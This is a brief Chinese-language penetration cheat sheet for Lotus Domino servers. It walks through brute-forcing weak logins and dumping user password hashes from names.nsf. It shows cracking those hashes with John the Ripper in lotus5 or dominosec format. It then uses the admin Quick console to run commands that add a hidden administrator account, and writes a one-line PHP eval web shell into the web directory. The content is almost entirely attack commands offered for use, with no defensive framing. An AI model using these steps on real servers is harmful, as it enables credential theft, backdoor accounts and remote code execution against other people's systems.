Domino 渗透相关

BURP抓包,暴力破解弱口令账户或者尝试admin/password

登录弱口令账户以后,访问/names.nsf  /webadmin.nsf /admin4.nsf

读取所有用户HASH与NSF文件

读取HASH地址为:/names.nsf/$users?OpenView&Start=1&count=292

 

保存格式为用户名:hash (不包含括号)

使用kali里面的john 破解hash 

 

john hash文件 --format=lotus5 

或者

john hash文件 --format=dominosec

 

命令执行

 

使用管理员权限用户访问/webadmin.nsf记住文件目录位置,然后访问 Quick console 

 

输入load cmd /c net user wooyun$ Wooyun@2016 /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt

 

load cmd /c net localgroup administrators wooyun$ /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt

 

http://网站/download/filesets/ipconfig.txt

 

写shell

 

load cmd /c echo ^<?php @eval($_POST['pass']);?^> > D:\Lotus\Domino\data\domino\html\download\filesets\netuser1.php